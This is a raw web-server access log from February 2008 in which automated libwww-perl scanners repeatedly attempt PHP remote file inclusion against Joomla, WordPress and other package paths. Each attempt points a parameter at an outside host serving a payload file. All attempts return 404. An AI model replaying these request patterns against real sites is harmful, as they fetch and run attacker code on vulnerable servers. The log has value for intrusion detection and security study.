62.168.15.147 - - [12/Feb/2008:12:53:32 -0800] "GET /logs/access_080122.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:53:33 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:53:33 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:54:12 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:12:54:12 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:54:21 -0800] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:54:21 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:54:22 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:12:55:17 -0800] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:55:34 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:55:34 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:55:35 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:12:55:42 -0800] "GET /logs/access_080118.log//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:12:55:42 -0800] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:12:55:43 -0800] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.197.68.66 - - [12/Feb/2008:12:55:43 -0800] "GET /logs/access_080108.log//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.217.247.166 - - [12/Feb/2008:12:56:21 -0800] "GET /logs/access_080130.log//modules/TotalCalendar/about.php?inc_dir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:56:28 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.238 - - [12/Feb/2008:12:56:29 -0800] "GET /newspublish/include.php?path[docroot]=http://www.australiada.net/userpics/zwierzeta_motyle/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:12:57:33 -0800] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:12:57:33 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:12:57:33 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:12:57:40 -0800] "GET /logs/access_080131.log/modules/Neos_Chronos/header.php?base_folder=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.211.255.3 - - [12/Feb/2008:12:57:51 -0800] "GET /logs/access_080130.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:58:40 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:58:40 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:58:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:12:59:05 -0800] "GET /logs/access_080131.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
193.34.68.128 - - [12/Feb/2008:12:59:21 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.infuse.be/v2//cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:03:58 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:04:00 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:04:01 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:04:30 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:04:30 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:04:30 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:13:05:21 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:13:05:21 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:05:26 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:05:27 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:05:27 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.222.218 - - [12/Feb/2008:13:05:35 -0800] "GET /config.php?xcart_dir=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.205.44 - - [12/Feb/2008:13:05:40 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:06:56 -0800] "GET /logs/access.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:06:57 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:06:57 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:13:07:19 -0800] "GET /logs/access_080131.log/index2.php?x=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:13:07:19 -0800] "GET /logs/index2.php?x=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:13:07:34 -0800] "GET /logs/access_080122.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.161.218 - - [12/Feb/2008:13:08:00 -0800] "GET /logs/access_080108.log/index2.php?x=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:08:04 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:08:10 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:13:08:15 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:08:40 -0800] "GET /logs/access_080105.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.27.111 - - [12/Feb/2008:13:09:45 -0800] "GET /bikes/dteel/2008_01_26/?D=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.193.222.218 - - [12/Feb/2008:13:10:19 -0800] "GET /logs/access_080105.log/config.php?xcart_dir=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [12/Feb/2008:13:10:19 -0800] "GET /logs/config.php?xcart_dir=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [12/Feb/2008:13:11:57 -0800] "GET /logs/access_071220.log/config.php?xcart_dir=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:13:03 -0800] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.11 - - [12/Feb/2008:13:13:03 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:13:05 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:13:05 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:13:14:04 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:13:14:04 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.194.246 - - [12/Feb/2008:13:14:24 -0800] "GET /index2.php?x=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:14:36 -0800] "GET /logs/access_071225.log//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:14:37 -0800] "GET //index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:13:14:37 -0800] "GET /logs//index.php?option=com_content&do_pdf=1&id=14//?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:14:56 -0800] "GET /logs/access_080121.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:14:56 -0800] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:14:56 -0800] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:13:15:29 -0800] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:13:15:29 -0800] "GET /classes/core/language.php?rootdir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:13:15:30 -0800] "GET /logs/classes/core/language.php?rootdir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:13:16:35 -0800] "GET /logs/index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:13:16:35 -0800] "GET /index.php?option=com_wmtportfolio&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:18:33 -0800] "GET /logs/access_080122.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://matyie.t35.com/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.25.2 - - [12/Feb/2008:13:19:23 -0800] "GET /logs/access_071219.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [12/Feb/2008:13:19:31 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [12/Feb/2008:13:19:31 -0800] "GET /logs/access_080113.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
209.90.120.18 - - [12/Feb/2008:13:20:12 -0800] "GET /logs/access_080122.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.j-vision.co.kr/rhe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:13:20:16 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.226.24 - - [12/Feb/2008:13:20:22 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.213.194.42 - - [12/Feb/2008:13:20:29 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [12/Feb/2008:13:20:30 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [12/Feb/2008:13:20:30 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [12/Feb/2008:13:20:39 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://www.hoopstar.ru/usr/xml/vi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.157.122.154 - - [12/Feb/2008:13:20:56 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.157.122.154 - - [12/Feb/2008:13:21:09 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:13:21:48 -0800] "GET /ipblock.inc.php?path_escape=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:13:21:48 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
71.245.244.82 - - [12/Feb/2008:13:22:38 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [12/Feb/2008:13:23:12 -0800] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.fidanquetravel.com/images/PDF/foggian.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.108 - - [12/Feb/2008:13:23:46 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [12/Feb/2008:13:23:46 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:13:23:57 -0800] "GET /photo_comment.php?toroot=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
67.19.49.228 - - [12/Feb/2008:13:23:58 -0800] "GET /logs/photo_comment.php?toroot=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.198.89.199 - - [12/Feb/2008:13:24:14 -0800] "GET /logs/access_071225.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [12/Feb/2008:13:24:15 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [12/Feb/2008:13:24:15 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:13:25:36 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.pimskeukens.nl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/zoom/.chie/lako.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:13:25:38 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.pimskeukens.nl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/zoom/.chie/lako.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:13:25:44 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.pimskeukens.nl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/zoom/.chie/lako.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:13:25:52 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.pimskeukens.nl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/zoom/.chie/lako.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:13:26:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.pimskeukens.nl/mambots/editors/tinymce/jscripts/tiny_mce/plugins/zoom/.chie/lako.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
